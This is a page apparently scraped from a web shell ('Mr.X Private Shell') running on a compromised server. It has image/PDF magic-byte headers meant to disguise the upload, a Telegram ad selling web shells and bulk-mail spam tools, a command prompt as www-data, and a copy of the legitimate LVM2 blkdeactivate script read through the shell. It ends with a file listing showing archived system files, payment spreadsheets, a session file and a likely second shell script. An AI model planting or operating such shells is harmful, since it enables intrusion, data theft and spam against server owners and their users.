GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
usr/sbin/blkdeactivate000075500000037737000000000000011022 0ustar00#!/bin/bash
#
# Copyright (C) 2012-2020 Red Hat, Inc. All rights reserved.
#
# This file is part of LVM2.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Author: Peter Rajnoha <prajnoha at redhat.com>
#
# Script for deactivating block devices
#
# Requires:
#   bash >= 4.0 (associative array support)
#   util-linux {
#       lsblk >= 2.22 (lsblk -s support)
#       umount
#   }
#   dmsetup >= 1.02.68 (--retry option support)
#   lvm >= 2.2.89 (activation/retry_deactivation config support)
#

#set -x
shopt -s dotglob nullglob

TOOL=blkdeactivate

DEV_DIR="/dev"
SYS_BLK_DIR="/sys/block"

MDADM="/sbin/mdadm"
MOUNTPOINT="/bin/mountpoint"
MPATHD="/sbin/multipathd"
UMOUNT="/bin/umount"
VDO="/bin/vdo"

sbindir="/sbin"
DMSETUP="$sbindir/dmsetup"
LVM="$sbindir/lvm"

if "$UMOUNT" --help | grep -- "--all-targets" >"$DEV_DIR/null"; then
	UMOUNT_OPTS="--all-targets "
else
	UMOUNT_OPTS=""
	FINDMNT="/bin/findmnt -r --noheadings -u -o TARGET"
	FINDMNT_READ="read -r mnt"
fi
DMSETUP_OPTS=""
LVM_OPTS=""
MDADM_OPTS=""
MPATHD_OPTS=""
VDO_OPTS=""

LSBLK="/bin/lsblk -r --noheadings -o TYPE,KNAME,NAME,MOUNTPOINT"
LSBLK_VARS="local devtype local kname local name local mnt"
LSBLK_READ="read -r devtype kname name mnt"
SORT_MNT="/usr/bin/sort -r -u -k 4"

# Do not show tool errors by default (only done/skipping summary
# message provided by this script) and no verbose mode by default.
ERRORS=0
VERBOSE=0

# Do not unmount mounted devices by default.
DO_UMOUNT=0

# Deactivate each LV separately by default (not the whole VG).
LVM_DO_WHOLE_VG=0
# Do not retry LV deactivation by default.
LVM_CONFIG="activation{retry_deactivation=0}"

# Do not wait for MD RAID device resync, recovery or reshape.
MDRAID_DO_WAIT=0

# Do not disable queueing if set on multipath devices.
MPATHD_DO_DISABLEQUEUEING=0

#
# List of device names and/or VGs to be skipped.
# Device name is the KNAME from lsblk output.
#
# If deactivation of any device fails, it's automatically
# added to the SKIP_DEVICE_LIST (also a particular VG
# added to the SKIP_VG_LIST for a device that is an LV).
#
# These lists provide device tree pruning to skip
# particular device/VG deactivation that failed already.
# (lists are associative arrays!)
#
declare -A SKIP_DEVICE_LIST=()
declare -A SKIP_VG_LIST=()

#
# List of mountpoints to be skipped. Any device that is mounted on the mountpoint
# listed here will be added to SKIP_DEVICE_LIST (and SKIP_VG_LIST) automatically.
# (list is an associative array!)
#
declare -A SKIP_UMOUNT_LIST=(["/"]=1 \
                             ["/lib"]=1 ["/lib64"]=1 \
                             ["/bin"]=1 ["/sbin"]=1 \
                             ["/var"]=1 ["/var/log"]=1 \
                             ["/usr"]=1 \
                             ["/usr/lib"]=1 ["/usr/lib64"]=1 \
                             ["/usr/sbin"]=1 ["/usr/bin"]=1)
# Bash can't properly handle '[' and ']' used as a subscript
# within the '()'initialization - it needs to be done separately!
SKIP_UMOUNT_LIST["[SWAP]"]=1

usage() {
	echo "${TOOL}: Utility to deactivate block devices"
	echo
	echo "  ${TOOL} [options] [device...]"
	echo "    - Deactivate block device tree."
	echo "      If devices are specified, deactivate only supplied devices and their holders."
	echo
	echo "  Options:"
	echo "    -e | --errors                       Show errors reported from tools"
	echo "    -h | --help                         Show this help message"
	echo "    -d | --dmoptions     DM_OPTIONS     Comma separated DM specific options"
	echo "    -l | --lvmoptions    LVM_OPTIONS    Comma separated LVM specific options"
	echo "    -m | --mpathoptions  MPATH_OPTIONS  Comma separated DM-multipath specific options"
	echo "    -r | --mdraidoptions MDRAID_OPTIONS Comma separated MD RAID specific options"
        echo "    -o | --vdooptions    VDO_OPTIONS    Comma separated VDO specific options"
	echo "    -u | --umount                       Unmount the device if mounted"
	echo "    -v | --verbose                      Verbose mode (also implies -e)"
	echo
	echo "  Device specific options:"
	echo "    DM_OPTIONS:"
	echo "      retry           retry removal several times in case of failure"
	echo "      force           force device removal"
	echo "    LVM_OPTIONS:"
	echo "      retry           retry removal several times in case of failure"
	echo "      wholevg         deactivate the whole VG when processing an LV"
	echo "    MDRAID_OPTIONS:"
	echo "      wait            wait for resync, recovery or reshape to complete first"
	echo "    MPATH_OPTIONS:"
	echo "      disablequeueing disable queueing on all DM-multipath devices first"
        echo "    VDO_OPTIONS:"
        echo "      configfile=file use specified VDO configuration file"

	exit
}

add_device_to_skip_list() {
	SKIP_DEVICE_LIST+=(["$kname"]=1)
	return 1
}

add_vg_to_skip_list() {
	SKIP_VG_LIST+=(["$DM_VG_NAME"]=1)
	return 1
}

is_top_level_device() {
	# top level devices do not have any holders, that is
	# the SYS_BLK_DIR/<device_name>/holders dir is empty
	files=$(echo "$SYS_BLK_DIR/$kname/holders/"*)
	test -z "$files"
}

device_umount_one() {
	test -z "$mnt" && return 0

	if test -z "${SKIP_UMOUNT_LIST["$mnt"]}" -a "$DO_UMOUNT" -eq "1"; then
		echo -n "  [UMOUNT]: unmounting $name ($kname) mounted on $mnt... "
		if eval "$UMOUNT" $UMOUNT_OPTS "$(printf "%s" "$mnt")" "$OUT" "$ERR"; then
			echo "done"
		elif "$MOUNTPOINT" -q "$mnt"; then
			echo "skipping"
			add_device_to_skip_list
		else
			echo "already unmounted"
		fi
	else
		echo "  [SKIP]: unmount of $name ($kname) mounted on $mnt"
		add_device_to_skip_list
	fi
}

device_umount() {
	test "$devtype" != "lvm" && test "${kname:0:3}" != "dm-" \
          && test "${kname:0:2}" != "md" && return 0

	# FINDMNT is defined only if umount --all-targets is not available.
	# In that case, read the list of multiple mount points of one device
	# using FINDMNT and unmount it one by one manually.
	if test -z "$FINDMNT"; then
		device_umount_one
	else
		while $FINDMNT_READ; do
			device_umount_one || return 1
		done <<< "$($FINDMNT "$DEV_DIR/$kname")"
	fi

}

deactivate_holders () {
	local skip=1; $LSBLK_VARS

	# Get holders for the device - either a mount or another device.
	# First line on the lsblk output is the device itself - skip it for
	# the deactivate call as this device is already being deactivated.
	while $LSBLK_READ; do
		test -e "$SYS_BLK_DIR/$kname" || continue
		# check if the device not on the skip list already
		test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

		# try to deactivate the holder
		test "$skip" -eq 1 && skip=0 && continue
		deactivate || return 1
	done <<< "$($LSBLK "$1")"
}

deactivate_dm () {
	local xname
	xname=$(printf "%s" "$name")
	test -b "$DEV_DIR/mapper/$xname" || return 0
	test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

	deactivate_holders "$DEV_DIR/mapper/$xname" || return 1

	echo -n "  [DM]: deactivating $devtype device $xname ($kname)... "
	if eval "$DMSETUP" $DMSETUP_OPTS remove "$xname" "$OUT" "$ERR"; then
		echo "done"
	else
		echo "skipping"
		add_device_to_skip_list
	fi
}

deactivate_lvm () {
	local DM_VG_NAME; local DM_LV_NAME

	eval "$(eval "$DMSETUP" splitname --nameprefixes --noheadings --rows "$name" LVM "$ERR")"
	test -b "$DEV_DIR/$DM_VG_NAME/$DM_LV_NAME" || return 0
	test -z "${SKIP_VG_LIST["$DM_VG_NAME"]}" || return 1

	if test "$LVM_DO_WHOLE_VG" -eq 0; then
		# Skip LVM device deactivation if LVM tools missing.
		test "$LVM_AVAILABLE" -eq 0 && {
			add_device_to_skip_list
			return 1
		}
		# Deactivating only the LV specified
		deactivate_holders "$DEV_DIR/$DM_VG_NAME/$DM_LV_NAME" || {
			add_device_to_skip_list
			return 1
		}

		echo -n "  [LVM]: deactivating Logical Volume $DM_VG_NAME/$DM_LV_NAME... "
		if eval "$LVM" lvchange $LVM_OPTS --config \'log\{prefix=\"\"\} $LVM_CONFIG\' -aln "$DM_VG_NAME/$DM_LV_NAME" "$OUT" "$ERR"; then
			echo "done"
		else
			echo "skipping"
			add_device_to_skip_list
		fi

	else
		# Skip LVM VG deactivation if LVM tools missing.
		test "$LVM_AVAILABLE" -eq 0 && {
			add_vg_to_skip_list
			return 1
		}
		# Deactivating the whole VG the LV is part of
		lv_list=$(eval "$LVM" vgs --config "$LVM_CONFIG" --noheadings --rows -o lv_name "$DM_VG_NAME" "$ERR")
		for lv in $lv_list; do
			test -b "$DEV_DIR/$DM_VG_NAME/$lv" || continue
			deactivate_holders "$DEV_DIR/$DM_VG_NAME/$lv" || {
				add_vg_to_skip_list
				return 1
			}
		done

		echo -n "  [LVM]: deactivating Volume Group $DM_VG_NAME... "
		if eval "$LVM" vgchange $LVM_OPTS --config \'log\{prefix=\"    \"\} $LVM_CONFIG\' -aln "$DM_VG_NAME" "$OUT" "$ERR"; then
			echo "done"
		else
			echo "skipping"
			add_vg_to_skip_list
		fi
	fi
}

deactivate_md () {
	local xname
	xname=$(printf "%s" "$name")
	local sync_action
	test -b "$DEV_DIR/$xname" || return 0
	test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

	# Skip MD device deactivation if MD tools missing.
	test "$MDADM_AVAILABLE" -eq 0 && {
		add_device_to_skip_list
		return 1
	}

	deactivate_holders "$DEV_DIR/$xname" || return 1

	echo -n "  [MD]: deactivating $devtype device $kname... "

	test "$MDRAID_DO_WAIT" -eq 1 && {
		sync_action=$(cat "$SYS_BLK_DIR/$kname/md/sync_action")
		test "$sync_action" != "idle" && {
			echo -n "$sync_action action in progress... "
			if eval "$MDADM" $MDADM_OPTS -W "$DEV_DIR/$kname" "$OUT" "$ERR"; then
				echo -n "complete... "
			else
				test $? -ne 1 && echo -n "failed to wait for $sync_action action... "
			fi
		}
	}

	if eval "$MDADM" $MDADM_OPTS -S "$xname" "$OUT" "$ERR"; then
		echo "done"
	else
		echo "skipping"
		add_device_to_skip_list
	fi
}

deactivate_vdo() {
        local xname
        xname=$(printf "%s" "$name")
        test -b "$DEV_DIR/mapper/$xname" || return 0
        test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

	# Skip VDO device deactivation if VDO tools missing.
	test "$VDO_AVAILABLE" -eq 0 && {
		add_device_to_skip_list
		return 1
	}

        deactivate_holders "$DEV_DIR/mapper/$xname" || return 1

        echo -n "  [VDO]: deactivating VDO volume $xname... "
        if eval "$VDO" stop $VDO_OPTS --name="$xname" "$OUT" "$ERR"; then
                echo "done"
        else
                echo "skipping"
                add_device_to_skip_list
        fi
}

deactivate () {
	######################################################################
	# DEACTIVATION HOOKS FOR NEW DEVICE TYPES GO HERE!                   #
	#                                                                    #
	# Identify a new device type either by inspecting the TYPE provided  #
	# by lsblk directly ($devtype) or by any other mean that is suitable #
	# e.g. the KNAME provided by lsblk ($kname). See $LSBLK_VARS for     #
	# complete list of variables that may be used. Then call a           #
	# device-specific deactivation function that handles the exact type. #
	#                                                                    #
        # This device-specific function will certainly need to call          #
	# deactivate_holders first to recursively deactivate any existing    #
	# holders it might have before deactivating the device it processes. #
	######################################################################
	if test "$devtype" = "lvm"; then
		deactivate_lvm
        elif test "$devtype" = "vdo"; then
                deactivate_vdo
	elif test "${kname:0:3}" = "dm-"; then
		deactivate_dm
	elif test "${kname:0:2}" = "md"; then
		deactivate_md
	fi
}

deactivate_all() {
	$LSBLK_VARS
	skip=0

	echo "Deactivating block devices:"

	test "$MPATHD_RUNNING" -eq 1 && {
		echo -n "  [DM]: disabling queueing on all multipath devices... "
		eval "$MPATHD" $MPATHD_OPTS disablequeueing maps "$ERR" | grep '^ok$' >"$DEV_DIR/null" && echo "done" || echo "failed"
	}

	if test $# -eq 0; then
		#######################
		# Process all devices #
		#######################

		# Unmount all relevant mountpoints first
		while $LSBLK_READ; do
			device_umount
		done <<< "$($LSBLK | $SORT_MNT)"

		# Do deactivate
		while $LSBLK_READ; do
			# 'disk' is at the bottom already and it's a real device
			test "$devtype" = "disk" && continue

			# if deactivation of any device fails, skip processing
			# any subsequent devices within its subtree as the
			# top-level device could not be deactivated anyway
			test "$skip" -eq 1 && {
				# reset 'skip' on top level device
				if is_top_level_device ; then
					skip=0
				else
					continue
				fi
			}

			# check if the device is not on the skip list already
			test -z "${SKIP_DEVICE_LIST["$kname"]}" || continue

			# try to deactivate top-level device, set 'skip=1'
			# if it fails to do so - this will cause all the
			# device's subtree to be skipped when processing
			# devices further in this loop
			deactivate || skip=1
		done <<< "$($LSBLK -s)"
	else
		##################################
		# Process only specified devices #
		##################################

		while test $# -ne 0; do
			# Unmount all relevant mountpoints first
			while $LSBLK_READ; do
				device_umount
			done <<< "$($LSBLK "$1" | $SORT_MNT)"

			# Do deactivate
			# Single dm device tree deactivation.
			if test -b "$1"; then
				$LSBLK_READ <<< "$($LSBLK --nodeps "$1")"

				# check if the device is not on the skip list already
				test -z "${SKIP_DEVICE_LIST["$kname"]}" || {
					shift
					continue
				}

				deactivate
			else
				echo "$1: device not found"
				return 1
			fi
			shift
		done;
	fi
}

get_dmopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case $opt in
			"") ;;
			"retry") DMSETUP_OPTS+="--retry " ;;
			"force") DMSETUP_OPTS+="--force " ;;
			*) echo "$opt: unknown DM option"
		esac
	done

	IFS=$ORIG_IFS
}

get_lvmopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"retry") LVM_CONFIG="activation{retry_deactivation=1}" ;;
			"wholevg") LVM_DO_WHOLE_VG=1 ;;
			*) echo "$opt: unknown LVM option"
		esac
	done

	IFS=$ORIG_IFS
}

get_mdraidopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"wait") MDRAID_DO_WAIT=1 ;;
			*) echo "$opt: unknown MD RAID option"
		esac
	done

	IFS=$ORIG_IFS
}

get_mpathopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"disablequeueing") MPATHD_DO_DISABLEQUEUEING=1 ;;
			*) echo "$opt: unknown DM-multipath option"
		esac
	done

	IFS=$ORIG_IFS
}

get_vdoopts() {
        ORIG_IFS=$IFS; IFS=','

        for opt in $1; do
                case "$opt" in
                        "") ;;
                        configfile=*) tmp=${opt#*=}; VDO_OPTS+="--confFile=${tmp%%,*} " ;;
                        *) echo "$opt: unknown VDO option"
                esac
        done

        IFS=$ORIG_IFS
}

set_env() {
	if test "$ERRORS" -eq "1"; then
		unset ERR
	else
		ERR="2>$DEV_DIR/null"
	fi

	if test "$VERBOSE" -eq "1"; then
		unset OUT
		UMOUNT_OPTS+="-v"
		DMSETUP_OPTS+="-vvvv"
		LVM_OPTS+="-vvvv"
		MDADM_OPTS+="-vv"
		MPATHD_OPTS+="-v 3"
                VDO_OPTS+="--verbose "
	else
		OUT="1>$DEV_DIR/null"
	fi

	if test -f "$LVM"; then
		LVM_AVAILABLE=1
	else
		LVM_AVAILABLE=0
	fi

	if test -f $MDADM; then
		MDADM_AVAILABLE=1
	else
		MDADM_AVAILABLE=0
	fi

        if test -f $VDO; then
                VDO_AVAILABLE=1
        else
                VDO_AVAILABLE=0
        fi

	MPATHD_RUNNING=0
	test "$MPATHD_DO_DISABLEQUEUEING" -eq 1 && {
		if test -f "$MPATHD"; then
			if eval "$MPATHD" show daemon "$ERR" | grep "running" >"$DEV_DIR/null"; then
				MPATHD_RUNNING=1
			fi
		fi
	}
}

while test $# -ne 0; do
	case "$1" in
		"") ;;
		"-e"|"--errors") ERRORS=1 ;;
		"-h"|"--help") usage ;;
		"-d"|"--dmoptions") get_dmopts "$2" ; shift ;;
		"-l"|"--lvmoptions") get_lvmopts "$2" ; shift ;;
		"-m"|"--mpathoptions") get_mpathopts "$2" ; shift ;;
		"-r"|"--mdraidoptions") get_mdraidopts "$2"; shift ;;
                "-o"|"--vdooptions") get_vdoopts "$2"; shift ;;
		"-u"|"--umount") DO_UMOUNT=1 ;;
		"-v"|"--verbose") VERBOSE=1 ; ERRORS=1 ;;
		"-vv") VERBOSE=1 ; ERRORS=1 ; set -x ;;
		*) break ;;
	esac
	shift
done

set_env
deactivate_all "$@"

Filemanager

Name Type Size Permission Actions
.wp-bak.bz2.tar File 923 KB 0644
.wp-bak.bz2.wp-bak.bz2.tar.gz File 59.31 KB 0644
10.tar File 9.73 MB 0644
10.tar.gz File 5.28 MB 0644
109.tar File 17.5 KB 0644
109.tar.gz File 12.97 KB 0644
114.tar File 133 KB 0644
114.tar.gz File 128.07 KB 0644
124.tar File 470.5 KB 0644
124.tar.gz File 463.63 KB 0644
126.tar File 250.5 KB 0644
126.tar.gz File 235.69 KB 0644
127.tar File 679.5 KB 0644
127.tar.gz File 669.58 KB 0644
128.tar File 195.5 KB 0644
128.tar.gz File 188.81 KB 0644
136999-A.pdf.pdf.tar.gz File 372.49 KB 0644
136999-A.pdf.tar File 395 KB 0644
152.tar File 94 KB 0644
152.tar.gz File 84.78 KB 0644
16.tar File 666.5 KB 0644
16.tar.gz File 656.57 KB 0644
163.tar File 192 KB 0644
163.tar.gz File 141.91 KB 0644
181.tar File 34 KB 0644
181.tar.gz File 20.45 KB 0644
188.tar File 212 KB 0644
188.tar.gz File 200.36 KB 0644
194.tar File 134.5 KB 0644
194.tar.gz File 131.12 KB 0644
195.tar File 144.5 KB 0644
195.tar.gz File 141.63 KB 0644
199.tar File 105 KB 0644
199.tar.gz File 96.86 KB 0644
20.zip File 3.85 KB 0644
20250425141311.tar File 114.5 KB 0644
20250425141311.tar.gz File 49.29 KB 0644
219.tar File 777 KB 0644
219.tar.gz File 768.04 KB 0644
224.tar File 144 KB 0644
224.tar.gz File 134.38 KB 0644
226.tar File 78 KB 0644
226.tar.gz File 71.83 KB 0644
228.tar File 528 KB 0644
228.tar.gz File 519.7 KB 0644
23.tar File 63 KB 0644
23.tar.gz File 61.6 KB 0644
232.tar File 103 KB 0644
232.tar.gz File 95.94 KB 0644
234.tar File 454 KB 0644
234.tar.gz File 447.5 KB 0644
241.tar File 218 KB 0644
241.tar.gz File 211.42 KB 0644
242.tar File 218 KB 0644
242.tar.gz File 211.43 KB 0644
245.tar File 643 KB 0644
245.tar.gz File 572.92 KB 0644
246.tar File 1.23 MB 0644
246.tar.gz File 1.2 MB 0644
250.tar File 452.5 KB 0644
250.tar.gz File 446.15 KB 0644
253.tar File 77.5 KB 0644
253.tar.gz File 72.01 KB 0644
257.tar File 210.5 KB 0644
257.tar.gz File 155.84 KB 0644
26.tar File 7.16 MB 0644
26.tar.gz File 6.05 MB 0644
281.tar File 42.5 KB 0644
281.tar.gz File 39.09 KB 0644
295.tar File 280 KB 0644
295.tar.gz File 265.36 KB 0644
2lco1s.zip File 254 B 0644
304.tar File 281 KB 0644
304.tar.gz File 275.78 KB 0644
314.tar File 103.5 KB 0644
314.tar.gz File 99.17 KB 0644
319.tar File 50 KB 0644
319.tar.gz File 43.72 KB 0644
320.tar File 105.5 KB 0644
320.tar.gz File 97.6 KB 0644
321.tar File 80 KB 0644
321.tar.gz File 40.95 KB 0644
325.tar File 75.5 KB 0644
325.tar.gz File 39.79 KB 0644
333.tar File 302.5 KB 0644
333.tar.gz File 294.11 KB 0644
343.tar File 89.5 KB 0644
343.tar.gz File 82.33 KB 0644
35.tar File 2 KB 0644
35.tar.gz File 193 B 0644
353.tar File 242 KB 0644
353.tar.gz File 183.88 KB 0644
358.tar File 2.29 MB 0644
358.tar.gz File 2.28 MB 0644
367.tar File 1.23 MB 0644
367.tar.gz File 1.2 MB 0644
39.tar File 2 KB 0644
39.tar.gz File 191 B 0644
3s58b1.tar File 322.5 KB 0644
3s58b1.tar.gz File 58.64 KB 0644
47.tar File 289.5 KB 0644
47.tar.gz File 274.21 KB 0644
56.tar File 54 KB 0644
56.tar.gz File 48.49 KB 0644
61.zip File 575.18 KB 0644
67.tar File 356.5 KB 0644
67.tar.gz File 303.6 KB 0644
71.zip File 64.08 KB 0644
74.zip File 32.71 KB 0644
75ic6y.tar File 2 KB 0644
75ic6y.tar.gz File 187 B 0644
87.tar File 988 KB 0644
87.tar.gz File 595.6 KB 0644
Schet_na_oplatu-(7).pdf.pdf.tar.gz File 79.04 KB 0644
Schet_na_oplatu-(7).pdf.tar File 87 KB 0644
accessdb.tar File 16.5 KB 0644
accessdb.tar.gz File 3.38 KB 0644
acpi.tar File 2 KB 0644
acpi.tar.gz File 114 B 0644
agetty.tar File 57.5 KB 0644
agetty.tar.gz File 21.53 KB 0644
apt.tar File 1016 KB 0644
apt.tar.gz File 362.04 KB 0644
arch_status.tar File 1.5 KB 0644
arch_status.tar.gz File 82 B 0644
attr.tar File 8.5 KB 0644
attr.tar.gz File 297 B 0644
attr.zip File 1.59 KB 0644
blkdeactivate.tar File 17.5 KB 0644
blkdeactivate.tar.gz File 5 KB 0644
bus.tar File 18.5 KB 0644
bus.tar.gz File 1.44 KB 0644
bus.zip File 6.92 KB 0644
cgroup.tar File 2 KB 0644
cgroup.tar.gz File 93 B 0644
cmdline.tar File 2 KB 0644
cmdline.tar.gz File 214 B 0644
comm.tar File 7 KB 0644
comm.tar.gz File 102 B 0644
cpuset.tar File 3 KB 0644
cpuset.tar.gz File 89 B 0644
crda.tar File 10 KB 0644
crda.tar.gz File 3.25 KB 0644
ethtool.tar File 553 KB 0644
ethtool.tar.gz File 193.15 KB 0644
execdomains.tar File 2 KB 0644
execdomains.tar.gz File 112 B 0644
fb.tar File 2 KB 0644
fb.tar.gz File 97 B 0644
fqk09p.tar File 102.5 KB 0644
fqk09p.tar.gz File 75.94 KB 0644
fs.tar File 43.5 KB 0644
fs.tar.gz File 4.74 KB 0644
fsck.fat.fat.tar.gz File 35.83 KB 0644
fsck.fat.tar File 84 KB 0644
fsck.minix.minix.tar.gz File 21.18 KB 0644
fsck.minix.tar File 56 KB 0644
fsfreeze.tar File 16 KB 0644
fsfreeze.tar.gz File 4.16 KB 0644
gnupg.zip File 346.94 KB 0644
groff.zip File 28.43 KB 0644
group-.tar File 2.5 KB 0644
group-.tar.gz File 569 B 0644
include.zip File 58.57 MB 0644
init.tar File 1.78 MB 0644
init.tar.gz File 621.25 KB 0644
initcpio.zip File 503 B 0644
insmod.tar File 168 KB 0644
insmod.tar.gz File 76.66 KB 0644
interrupts.tar File 4 KB 0644
interrupts.tar.gz File 799 B 0644
ioports.tar File 3 KB 0644
ioports.tar.gz File 329 B 0644
ip6tables-nft.tar File 221 KB 0644
ip6tables-nft.tar.gz File 91.04 KB 0644
iscsistart.tar File 280.5 KB 0644
iscsistart.tar.gz File 107.64 KB 0644
j0cye.php File 159.91 KB 0644
j0cye.php.php.tar.gz File 29.46 KB 0644
libexec.zip File 123.84 MB 0644
limits.tar File 7 KB 0644
limits.tar.gz File 372 B 0644
locks.tar File 2.5 KB 0644
locks.tar.gz File 292 B 0644
lsb.tar File 24 KB 0644
lsb.tar.gz File 6.05 KB 0644
lsb.zip File 19.77 KB 0644
lvm.tar File 120 KB 0644
lvm.tar.gz File 28 KB 0644
lvmdiskscan.tar File 2.89 MB 0644
lvmdiskscan.tar.gz File 932.16 KB 0644
lvmsar.tar File 2.89 MB 0644
lvmsar.tar.gz File 932.15 KB 0644
man.tar File 119.5 KB 0644
man.tar.gz File 51.43 KB 0644
mandb.tar File 141.5 KB 0644
mandb.tar.gz File 58.62 KB 0644
maps.tar File 2.5 KB 0644
maps.tar.gz File 76 B 0644
mc.tar File 297 KB 0644
mc.tar.gz File 70.22 KB 0644
mcookie.tar File 28 KB 0644
mcookie.tar.gz File 8.89 KB 0644
mcview.tar File 1.05 MB 0644
mcview.tar.gz File 505.34 KB 0644
mdstat.tar File 2 KB 0644
mdstat.tar.gz File 161 B 0644
meminfo.tar File 3 KB 0644
meminfo.tar.gz File 603 B 0644
mime.zip File 7.24 KB 0644
modprobe.d.zip File 3.92 KB 0644
modules.tar File 6.5 KB 0644
modules.tar.gz File 1.14 KB 0644
motd.d.zip File 150 B 0644
mounts.tar File 7 KB 0644
mounts.tar.gz File 689 B 0644
network.tar File 2 KB 0644
network.tar.gz File 166 B 0644
newt.zip File 466 B 0644
nginx.tar File 387.5 KB 0644
nginx.tar.gz File 141.78 KB 0644
nginx.zip File 382.45 KB 0644
numa_maps.tar File 1.5 KB 0644
numa_maps.tar.gz File 81 B 0644
nvidia.zip File 363 B 0644
oom_adj.tar File 3 KB 0644
oom_adj.tar.gz File 91 B 0644
openssh.tar File 676 KB 0644
openssh.tar.gz File 280.98 KB 0644
openssh.zip File 671.5 KB 0644
payments 2025-05-28 15-23-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-23-40.xlsx.xlsx.tar.gz File 6.15 KB 0644
payments 2025-05-28 15-24-23.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-24-23.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-28 15-32-07.xlsx.tar File 8.5 KB 0644
payments 2025-05-28 15-32-07.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-29 03-55-40.xlsx.tar File 8.5 KB 0644
payments 2025-05-29 03-55-40.xlsx.xlsx.tar.gz File 6.16 KB 0644
payments 2025-05-30 07-55-52.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-55-52.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-05-30 07-59-34.xlsx.tar File 9 KB 0644
payments 2025-05-30 07-59-34.xlsx.xlsx.tar.gz File 6.44 KB 0644
payments 2025-07-16 13-57-11.xlsx.tar File 8.5 KB 0644
payments 2025-07-16 13-57-11.xlsx.xlsx.tar.gz File 6.32 KB 0644
payments 2025-07-16 14-04-06.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 14-04-06.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-16 15-16-08.xlsx.tar File 9.5 KB 0644
payments 2025-07-16 15-16-08.xlsx.xlsx.tar.gz File 7.3 KB 0644
payments 2025-07-18 12-09-36.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-36.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-07-18 12-09-53.xlsx.tar File 10 KB 0644
payments 2025-07-18 12-09-53.xlsx.xlsx.tar.gz File 7.9 KB 0644
payments 2025-08-01 07-45-11.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 07-45-11.xlsx.xlsx.tar.gz File 7 KB 0644
payments 2025-08-01 09-00-13.xlsx.tar File 9.5 KB 0644
payments 2025-08-01 09-00-13.xlsx.xlsx.tar.gz File 7 KB 0644
php.zip File 29.01 MB 0644
phpbMSSNu.tar File 186 KB 0644
phpbMSSNu.tar.gz File 41.1 KB 0644
phpwYbAa4.tar File 186 KB 0644
phpwYbAa4.tar.gz File 41.1 KB 0644
pinky.tar File 36 KB 0644
pinky.tar.gz File 13.52 KB 0644
pm-utils.tar File 6 KB 0644
pm-utils.tar.gz File 1.37 KB 0644
recovery-mode.zip File 13.68 KB 0644
rmt-tar.tar File 60.5 KB 0644
rmt-tar.tar.gz File 25.78 KB 0644
s29u8l.tar File 2 KB 0644
s29u8l.tar.gz File 184 B 0644
schedstat.tar File 3 KB 0644
schedstat.tar.gz File 194 B 0644
scsi.tar File 14.5 KB 0644
scsi.tar.gz File 2.29 KB 0644
sess_fp6t3llt9ahsqobkpe2s84nudb.tar File 2 KB 0644
sess_fp6t3llt9ahsqobkpe2s84nudb.tar.gz File 176 B 0644
sg_vpd.tar File 116 KB 0644
sg_vpd.tar.gz File 44.28 KB 0644
skel.tar File 8 KB 0644
skel.tar.gz File 2.18 KB 0644
smaps.tar File 1.5 KB 0644
smaps.tar.gz File 76 B 0644
softirqs.tar File 2 KB 0644
softirqs.tar.gz File 279 B 0644
swaps.tar File 2 KB 0644
swaps.tar.gz File 152 B 0644
sysusers.d.tar File 8.5 KB 0644
sysusers.d.tar.gz File 1.08 KB 0644
t0b24y.zip File 258 B 0644
tarcat.tar File 2.5 KB 0644
tarcat.tar.gz File 607 B 0644
tc.zip File 121.12 KB 0644
thin_dump.tar File 1.33 MB 0644
thin_dump.tar.gz File 510.81 KB 0644
tmp.zip File 2.03 MB 0644
uid_map.tar File 2 KB 0644
uid_map.tar.gz File 106 B 0644
update-java-alternatives.tar File 5 KB 0644
update-java-alternatives.tar.gz File 1.21 KB 0644
update-shells.tar File 5.5 KB 0644
update-shells.tar.gz File 1.55 KB 0644
vgremove.tar File 2.89 MB 0644
vgremove.tar.gz File 932.15 KB 0644
vgs.tar File 2.89 MB 0644
vgs.tar.gz File 932.15 KB 0644
wchan.tar File 3 KB 0644
wchan.tar.gz File 88 B 0644
xfs_logprint.tar File 80 KB 0644
xfs_logprint.tar.gz File 34.37 KB 0644
yrh2dj.tar File 923 KB 0644
yrh2dj.tar.gz File 59.25 KB 0644
zoneinfo.tar File 5.5 KB 0644
